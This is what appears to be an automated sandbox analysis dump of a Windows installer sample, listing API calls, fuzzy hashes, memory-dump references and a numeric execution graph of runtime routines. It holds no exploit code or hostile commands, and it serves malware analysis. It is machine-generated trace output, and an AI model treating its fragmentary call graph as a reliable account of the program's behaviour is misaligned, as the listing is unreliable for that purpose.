                                                                    • API String ID: 2883127279-0
                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                    APIs
                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                    • String ID: !N~
                                                                    • API String ID: 623250636-529124213
                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405C48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 3712363035-66219284
                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                    • API String ID: 3509786178-2769509956
                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                    Execution Graph

                                                                    Execution Coverage:3%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:3.6%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:67
                                                                    execution_graph 95931 241044 95936 242793 95931->95936 95933 24104a 95971 260413 29 API calls __onexit 95933->95971 95935 241054 95972 242a38 95936->95972 95940 24280a 95982 24bf73 95940->95982 95943 24bf73 22 API calls 95944 24281e 95943->95944 95945 24bf73 22 API calls 95944->95945 95946 242828 95945->95946 95947 24bf73 22 API calls 95946->95947 95948 242866 95947->95948 95949 24bf73 22 API calls 95948->95949 95950 242932 95949->95950 95987 242dbc 95950->95987 95954 242964 95955 24bf73 22 API calls 95954->95955 95956 24296e 95955->95956 96014 253160 95956->96014 95958 242999 96024 243166 95958->96024 95960 2429b5 95961 2429c5 GetStdHandle 95960->95961 95962 242a1a 95961->95962 95963 2839e7 95961->95963 95966 242a27 OleInitialize 95962->95966 95963->95962 96031 26014b 95963->96031 95965 2839f7 96041 2b0ac4 InitializeCriticalSectionAndSpinCount 95965->96041 95966->95933 95968 283a00 96044 2b12eb 95968->96044 95971->95935 96047 242a91 95972->96047 95975 242a91 22 API calls 95976 242a70 95975->95976 95977 24bf73 22 API calls 95976->95977 95978 242a7c 95977->95978 96054 248577 95978->96054 95980 2427c9 95981 24327e 6 API calls 95980->95981 95981->95940 95983 26017b 22 API calls 95982->95983 95984 24bf88 95983->95984 95985 26014b 22 API calls 95984->95985 95986 242814 95985->95986 95986->95943 95988 24bf73 22 API calls 95987->95988 95989 242dcc 95988->95989 95990 24bf73 22 API calls 95989->95990 95991 242dd4 95990->95991 96099 2481d6 95991->96099 95994 2481d6 22 API calls 95995 242de4 95994->95995 95996 24bf73 22 API calls 95995->95996 95997 242def 95996->95997 95998 26014b 22 API calls 95997->95998 95999 24293c 95998->95999 96000 243205 95999->96000 96001 243213 96000->96001 96002 24bf73 22 API calls 96001->96002 96003 24321e 96002->96003 96004 24bf73 22 API calls 96003->96004 96005 243229 96004->96005 96006 24bf73 22 API calls 96005->96006 96007 243234 96006->96007 96008 24bf73 22 API calls 96007->96008 96009 24323f 96008->96009 96010 2481d6 22 API calls 96009->96010 96011 24324a 96010->96011 96012 26014b 22 API calls 96011->96012 96013 243251 RegisterWindowMessageW 96012->96013 96013->95954 96015 2531a1 96014->96015 96022 25317d 96014->96022 96102 2605b2 5 API calls __Init_thread_wait 96015->96102 96016 25318e 96016->95958 96018 2531ab 96018->96022 96103 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96018->96103 96020 259f47 96020->96016 96105 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96020->96105 96022->96016 96104 2605b2 5 API calls __Init_thread_wait 96022->96104 96025 243176 96024->96025 96026 283c8f 96024->96026 96028 26014b 22 API calls 96025->96028 96106 2b3c4e 22 API calls 96026->96106 96030 24317e 96028->96030 96029 283c9a 96030->95960 96033 260150 96031->96033 96032 26ed7c ___std_exception_copy 21 API calls 96032->96033 96033->96032 96034 26016a 96033->96034 96037 26016c 96033->96037 96107 26521d 7 API calls 2 library calls 96033->96107 96034->95965 96036 2609dd 96109 263614 RaiseException 96036->96109 96037->96036 96108 263614 RaiseException 96037->96108 96040 2609fa 96040->95965 96110 2b0d18 96041->96110 96045 2b12f9 CreateThread 96044->96045 96046 283a0c CloseHandle 96044->96046 96045->96046 96113 2b12d1 96045->96113 96046->95962 96048 24bf73 22 API calls 96047->96048 96049 242a9c 96048->96049 96050 24bf73 22 API calls 96049->96050 96051 242aa4 96050->96051 96052 24bf73 22 API calls 96051->96052 96053 242a66 96052->96053 96053->95975 96055 248587 _wcslen 96054->96055 96056 286610 96054->96056 96059 2485c2 96055->96059 96060 24859d 96055->96060 96077 24adf4 96056->96077 96058 286619 96058->96058 96061 26014b 22 API calls 96059->96061 96066 2488e8 22 API calls 96060->96066 96063 2485ce 96061->96063 96067 26017b 96063->96067 96064 2485a5 __fread_nolock 96064->95980 96066->96064 96069 26014b 96067->96069 96070 26016a 96069->96070 96073 26016c 96069->96073 96081 26ed7c 96069->96081 96088 26521d 7 API calls 2 library calls 96069->96088 96070->96064 96072 2609dd 96090 263614 RaiseException 96072->96090 96073->96072 96089 263614 RaiseException 96073->96089 96076 2609fa 96076->96064 96078 24ae02 96077->96078 96079 24ae0b __fread_nolock 96077->96079 96078->96079 96093 24c2c9 96078->96093 96079->96058 96079->96079 96086 273b93 _abort 96081->96086 96082 273bd1 96092 26f649 20 API calls _abort 96082->96092 96084 273bbc RtlAllocateHeap 96085 273bcf 96084->96085 96084->96086 96085->96069 96086->96082 96086->96084 96091 26521d 7 API calls 2 library calls 96086->96091 96088->96069 96089->96072 96090->96076 96091->96086 96092->96085 96094 24c2dc 96093->96094 96098 24c2d9 __fread_nolock 96093->96098 96095 26014b 22 API calls 96094->96095 96096 24c2e7 96095->96096 96097 26017b 22 API calls 96096->96097 96097->96098 96098->96079 96100 24bf73 22 API calls 96099->96100 96101 242ddc 96100->96101 96101->95994 96102->96018 96103->96022 96104->96020 96105->96016 96106->96029 96107->96033 96108->96036 96109->96040 96111 2b0b03 InterlockedExchange 96110->96111 96112 2b0d26 GetCurrentProcess GetCurrentProcess DuplicateHandle 96110->96112 96111->95968 96112->96111 96114 2b12db 96113->96114 96115 2b12e0 96113->96115 96117 2b1196 InterlockedExchange 96114->96117 96118 2b11c7 96117->96118 96119 2b11c1 96117->96119 96120 26017b 22 API calls 96118->96120 96121 26017b 22 API calls 96119->96121 96122 2b11d9 ReadFile 96120->96122 96121->96118 96125 2b11fc 96122->96125 96126 2b12a8 96122->96126 96123 2b1206 EnterCriticalSection 96123->96125 96129 2b122e __fread_nolock 96123->96129 96124 2b12c1 InterlockedExchange 96124->96115 96125->96123 96125->96126 96125->96129 96126->96124 96127 2b1279 LeaveCriticalSection ReadFile 96127->96125 96127->96126 96128 26017b 22 API calls 96128->96129 96129->96127 96129->96128 96130 293c0a 96151 2ac819 96130->96151 96133 293c14 96134 293c3f 96133->96134 96135 2ac819 Sleep 96133->96135 96141 24efdb 96133->96141 96157 25aa65 23 API calls 96133->96157 96158 24b329 96134->96158 96135->96133 96139 293c8b 96165 2b446f 22 API calls 96139->96165 96144 24f450 96141->96144 96143 24f097 96145 24f483 96144->96145 96146 24f46f 96144->96146 96198 2b3fe1 82 API calls __wsopen_s 96145->96198 96166 24e960 96146->96166 96149 24f47a 96149->96143 96150 294584 96150->96150 96152 2ac83f 96151->96152 96153 2ac824 96151->96153 96154 2ac86d 96152->96154 96155 2ac85b Sleep 96152->96155 96153->96133 96154->96133 96155->96154 96157->96133 96159 24b338 _wcslen 96158->96159 96160 26017b 22 API calls 96159->96160 96161 24b360 __fread_nolock 96160->96161 96162 26014b 22 API calls 96161->96162 96163 24b376 96162->96163 96164 24bfa5 40 API calls 96163->96164 96164->96139 96165->96143 96199 250340 96166->96199 96168 24e99d 96169 24ea0b ISource 96168->96169 96170 2931d3 96168->96170 96172 24edd5 96168->96172 96173 24eac3 96168->96173 96179 24ebb8 96168->96179 96182 26014b 22 API calls 96168->96182 96193 24eb29 ISource __fread_nolock 96168->96193 96169->96149 96228 2b3fe1 82 API calls __wsopen_s 96170->96228 96172->96169 96183 26017b 22 API calls 96172->96183 96173->96172 96175 24eace 96173->96175 96174 24ecff 96177 24ed14 96174->96177 96178 2931c4 96174->96178 96176 26014b 22 API calls 96175->96176 96186 24ead5 __fread_nolock 96176->96186 96180 26014b 22 API calls 96177->96180 96227 2c6162 22 API calls 96178->96227 96184 26017b 22 API calls 96179->96184 96190 24eb6a 96180->96190 96182->96168 96183->96186 96184->96193 96185 26014b 22 API calls 96187 24eaf6 96185->96187 96186->96185 96186->96187 96187->96193 96222 24d260 191 API calls 96187->96222 96189 2931b3 96226 2b3fe1 82 API calls __wsopen_s 96189->96226 96190->96149 96193->96174 96193->96189 96193->96190 96194 29318e 96193->96194 96196 29316c 96193->96196 96223 2444fe 191 API calls 96193->96223 96225 2b3fe1 82 API calls __wsopen_s 96194->96225 96224 2b3fe1 82 API calls __wsopen_s 96196->96224 96198->96150 96217 250376 ISource 96199->96217 96200 26014b 22 API calls 96200->96217 96201 29632b 96238 2b3fe1 82 API calls __wsopen_s 96201->96238 96203 251695 96209 24bed9 22 API calls 96203->96209 96215 25049d ISource 96203->96215 96205 295cdb 96205->96215 96231 24bed9 96205->96231 96206 29625a 96237 2b3fe1 82 API calls __wsopen_s 96206->96237 96207 250aae ISource 96236 2b3fe1 82 API calls __wsopen_s 96207->96236 96208 24bed9 22 API calls 96208->96217 96209->96215 96214 2605b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96214->96217 96215->96168 96216 24bf73 22 API calls 96216->96217 96217->96200 96217->96201 96217->96203 96217->96205 96217->96206 96217->96207 96217->96208 96217->96214 96217->96215 96217->96216 96218 260413 29 API calls pre_c_initialization 96217->96218 96219 296115 96217->96219 96220 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96217->96220 96229 251990 191 API calls 2 library calls 96217->96229 96230 251e50 41 API calls ISource 96217->96230 96218->96217 96235 2b3fe1 82 API calls __wsopen_s 96219->96235 96220->96217 96222->96193 96223->96193 96224->96190 96225->96190 96226->96190 96227->96170 96228->96169 96229->96217 96230->96217 96232 24befc __fread_nolock 96231->96232 96233 24beed 96231->96233 96232->96215 96233->96232 96234 26017b 22 API calls 96233->96234 96234->96232 96235->96207 96236->96215 96237->96215 96238->96215 96239 2950ca 96251 24f800 ISource 96239->96251 96240 2b3fe1 82 API calls 96240->96251 96242 251ca0 22 API calls 96242->96251 96244 24bf73 22 API calls 96244->96251 96246 24bed9 22 API calls 96246->96251 96247 24fae1 96250 250340 191 API calls 96250->96251 96251->96240 96251->96242 96251->96244 96251->96246 96251->96247 96251->96250 96254 24be2d 96251->96254 96258 25b35c 191 API calls 96251->96258 96259 2605b2 5 API calls __Init_thread_wait 96251->96259 96260 260413 29 API calls __onexit 96251->96260 96261 260568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96251->96261 96262 2c5231 102 API calls 96251->96262 96263 2c731e 191 API calls 96251->96263 96255 24be38 96254->96255 96256 24be67 96255->96256 96264 24bfa5 40 API calls 96255->96264 96256->96251 96258->96251 96259->96251 96260->96251 96261->96251 96262->96251 96263->96251 96264->96256 96265 24f4c0 96268 25a025 96265->96268 96267 24f4cc 96269 25a046 96268->96269 96274 25a0a3 96268->96274 96270 250340 191 API calls 96269->96270 96269->96274 96275 25a077 96270->96275 96272 29806b 96272->96272 96273 25a0e7 96273->96267 96274->96273 96277 2b3fe1 82 API calls __wsopen_s 96274->96277 96275->96273 96275->96274 96276 24bed9 22 API calls 96275->96276 96276->96274 96277->96272 96278 278782 96283 27853e 96278->96283 96281 2787aa 96288 27856f try_get_first_available_module 96283->96288 96285 27876e 96302 272b5c 26 API calls __cftof 96285->96302 96287 2786c3 96287->96281 96295 280d04 96287->96295 96291 2786b8 96288->96291 96298 26917b 40 API calls 2 library calls 96288->96298 96290 27870c 96290->96291 96299 26917b 40 API calls 2 library calls 96290->96299 96291->96287 96301 26f649 20 API calls _abort 96291->96301 96293 27872b 96293->96291 96300 26917b 40 API calls 2 library calls 96293->96300 96303 280401 96295->96303 96297 280d1f 96297->96281 96298->96290 96299->96293 96300->96291 96301->96285 96302->96287 96305 28040d ___scrt_is_nonwritable_in_current_image 96303->96305 96304 28041b 96361 26f649 20 API calls _abort 96304->96361 96305->96304 96307 280454 96305->96307 96314 2809db 96307->96314 96308 280420 96362 272b5c 26 API calls __cftof 96308->96362 96313 28042a __fread_nolock 96313->96297 96364 2807af 96314->96364 96317 280a0d 96396 26f636 20 API calls _abort 96317->96396 96318 280a26 96382 275594 96318->96382 96321 280a12 96397 26f649 20 API calls _abort 96321->96397 96322 280a2b 96323 280a4b 96322->96323 96324 280a34 96322->96324 96395 28071a CreateFileW 96323->96395 96398 26f636 20 API calls _abort 96324->96398 96328 280a39 96399 26f649 20 API calls _abort 96328->96399 96330 280b01 GetFileType 96331 280b0c GetLastError 96330->96331 96332 280b53 96330->96332 96402 26f613 20 API calls 2 library calls 96331->96402 96404 2754dd 21 API calls 3 library calls 96332->96404 96333 280ad6 GetLastError 96401 26f613 20 API calls 2 library calls 96333->96401 96335 280a84 96335->96330 96335->96333 96400 28071a CreateFileW 96335->96400 96337 280b1a CloseHandle 96337->96321 96339 280b43 96337->96339 96403 26f649 20 API calls _abort 96339->96403 96341 280ac9 96341->96330 96341->96333 96343 280b74 96348 280bc0 96343->96348 96405 28092b 72 API calls 4 library calls 96343->96405 96344 280b48 96344->96321 96347 280be6 96349 280bed 96347->96349 96350 280bfe 96347->96350 96348->96349 96406 2804cd 72 API calls 3 library calls 96348->96406 96407 278a2e 96349->96407 96352 280478 96350->96352 96353 280c7c CloseHandle 96350->96353 96363 2804a1 LeaveCriticalSection __wsopen_s 96352->96363 96422 28071a CreateFileW 96353->96422 96355 280ca7 96356 280cb1 GetLastError 96355->96356 96357 280cdd 96355->96357 96423 26f613 20 API calls 2 library calls 96356->96423 96357->96352 96359 280cbd 96424 2756a6 21 API calls 3 library calls 96359->96424 96361->96308 96362->96313 96363->96313 96365 2807ea 96364->96365 96367 2807d0 96364->96367 96425 28073f 96365->96425 96367->96365 96432 26f649 20 API calls _abort 96367->96432 96369 2807df 96433 272b5c 26 API calls __cftof 96369->96433 96371 280822 96372 280851 96371->96372 96434 26f649 20 API calls _abort 96371->96434 96379 2808a4 96372->96379 96436 26da7d 26 API calls 2 library calls 96372->96436 96375 28089f 96377 28091e 96375->96377 96375->96379 96376 280846 96435 272b5c 26 API calls __cftof 96376->96435 96437 272b6c 11 API calls _abort 96377->96437 96379->96317 96379->96318 96381 28092a 96383 2755a0 ___scrt_is_nonwritable_in_current_image 96382->96383 96440 2732d1 EnterCriticalSection 96383->96440 96385 2755a7 96386 2755cc 96385->96386 96391 27563a EnterCriticalSection 96385->96391 96393 2755ee 96385->96393 96444 275373 96386->96444 96390 275617 __fread_nolock 96390->96322 96392 275647 LeaveCriticalSection 96391->96392 96391->96393 96392->96385 96441 27569d 96393->96441 96395->96335 96396->96321 96397->96352 96398->96328 96399->96321 96400->96341 96401->96321 96402->96337 96403->96344 96404->96343 96405->96348 96406->96347 96470 275737 96407->96470 96409 278a44 96483 2756a6 21 API calls 3 library calls 96409->96483 96411 278a3e 96411->96409 96414 275737 __wsopen_s 26 API calls 96411->96414 96421 278a76 96411->96421 96412 275737 __wsopen_s 26 API calls 96415 278a82 CloseHandle 96412->96415 96413 278a9c 96416 278abe 96413->96416 96484 26f613 20 API calls 2 library calls 96413->96484 96417 278a6d 96414->96417 96415->96409 96418 278a8e GetLastError 96415->96418 96416->96352 96420 275737 __wsopen_s 26 API calls 96417->96420 96418->96409 96420->96421 96421->96409 96421->96412 96422->96355 96423->96359 96424->96357 96427 280757 96425->96427 96426 280772 96426->96371 96427->96426 96438 26f649 20 API calls _abort 96427->96438 96429 280796 96439 272b5c 26 API calls __cftof 96429->96439 96431 2807a1 96431->96371 96432->96369 96433->96365 96434->96376 96435->96372 96436->96375 96437->96381 96438->96429 96439->96431 96440->96385 96452 273319 LeaveCriticalSection 96441->96452 96443 2756a4 96443->96390 96453 274ff0 96444->96453 96446 275392 96461 272d38 96446->96461 96449 2753e4 96449->96393 96451 2754ba EnterCriticalSection 96449->96451 96450 275385 96450->96446 96460 273778 11 API calls 2 library calls 96450->96460 96451->96393 96452->96443 96458 274ffd _abort 96453->96458 96454 27503d 96468 26f649 20 API calls _abort 96454->96468 96455 275028 RtlAllocateHeap 96457 27503b 96455->96457 96455->96458 96457->96450 96458->96454 96458->96455 96467 26521d 7 API calls 2 library calls 96458->96467 96460->96450 96462 272d43 RtlFreeHeap 96461->96462 96463 272d6c _free 96461->96463 96462->96463 96464 272d58 96462->96464 96463->96449 96469 26f649 20 API calls _abort 96464->96469 96466 272d5e GetLastError 96466->96463 96467->96458 96468->96457 96469->96466 96471 275744 96470->96471 96473 275759 96470->96473 96485 26f636 20 API calls _abort 96471->96485 96477 27577e 96473->96477 96487 26f636 20 API calls _abort 96473->96487 96474 275749 96486 26f649 20 API calls _abort 96474->96486 96477->96411 96478 275789 96488 26f649 20 API calls _abort 96478->96488 96480 275751 96480->96411 96481 275791 96489 272b5c 26 API calls __cftof 96481->96489 96483->96413 96484->96416 96485->96474 96486->96480 96487->96478 96488->96481 96489->96480 96490 25f9a3 96491 25f9ad 96490->96491 96495 25f9ce 96490->96495 96499 24c3ab 96491->96499 96494 25f9bd 96496 24c3ab 22 API calls 96494->96496 96497 29fb3c 96495->96497 96507 2a56ae 22 API calls ISource 96495->96507 96498 25f9cd 96496->96498 96500 24c3b9 96499->96500 96506 24c3e1 ISource 96499->96506 96501 24c3c7 96500->96501 96503 24c3ab 22 API calls 96500->96503 96502 24c3cd 96501->96502 96504 24c3ab 22 API calls 96501->96504 96502->96506 96508 24c7e0 96502->96508 96503->96501 96504->96502 96506->96494 96507->96495 96509 24c7eb ISource 96508->96509 96511 24c826 ISource 96509->96511 96512 25e322 22 API calls ISource 96509->96512 96511->96506 96512->96511 96513 26f06e 96514 26f07a ___scrt_is_nonwritable_in_current_image 96513->96514 96515 26f086 96514->96515 96516 26f09b 96514->96516 96532 26f649 20 API calls _abort 96515->96532 96526 2694fd EnterCriticalSection 96516->96526 96519 26f08b 96533 272b5c 26 API calls __cftof 96519->96533 96520 26f0a7 96527 26f0db 96520->96527 96525 26f096 __fread_nolock 96526->96520 96535 26f106 96527->96535 96529 26f0e8 96530 26f0b4 96529->96530 96555 26f649 20 API calls _abort 96529->96555 96534 26f0d1 LeaveCriticalSection __fread_nolock 96530->96534 96532->96519 96533->96525 96534->96525 96536 26f114 96535->96536 96537 26f12e 96535->96537 96566 26f649 20 API calls _abort 96536->96566 96556 26dcc5 96537->96556 96540 26f119 96567 272b5c 26 API calls __cftof 96540->96567 96541 26f137 96563 279789 96541->96563 96543 26f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 96543->96529 96546 26f1bf 96549 26f1dc 96546->96549 96554 26f1ee 96546->96554 96547 26f23b 96548 26f248 96547->96548 96547->96554 96569 26f649 20 API calls _abort 96548->96569 96568 26f41f 31 API calls 4 library calls 96549->96568 96552 26f1e6 96552->96543 96554->96543 96570 26f29b 30 API calls 2 library calls 96554->96570 96555->96530 96557 26dce6 96556->96557 96558 26dcd1 96556->96558 96557->96541 96571 26f649 20 API calls _abort 96558->96571 96560 26dcd6 96572 272b5c 26 API calls __cftof 96560->96572 96562 26dce1 96562->96541 96573 279606 96563->96573 96565 26f153 96565->96543 96565->96546 96565->96547 96566->96540 96567->96543 96568->96552 96569->96543 96570->96543 96571->96560 96572->96562 96574 279612 ___scrt_is_nonwritable_in_current_image 96573->96574 96575 279632 96574->96575 96576 27961a 96574->96576 96578 2796e6 96575->96578 96583 27966a 96575->96583 96608 26f636 20 API calls _abort 96576->96608 96613 26f636 20 API calls _abort 96578->96613 96579 27961f 96609 26f649 20 API calls _abort 96579->96609 96582 2796eb 96614 26f649 20 API calls _abort 96582->96614 96598 2754ba EnterCriticalSection 96583->96598 96584 279627 __fread_nolock 96584->96565 96587 2796f3 96615 272b5c 26 API calls __cftof 96587->96615 96588 279670 96590 279694 96588->96590 96591 2796a9 96588->96591 96610 26f649 20 API calls _abort 96590->96610 96599 27970b 96591->96599 96594 279699 96611 26f636 20 API calls _abort 96594->96611 96595 2796a4 96612 2796de LeaveCriticalSection __wsopen_s 96595->96612 96598->96588 96600 275737 __wsopen_s 26 API calls 96599->96600 96601 27971d 96600->96601 96602 279736 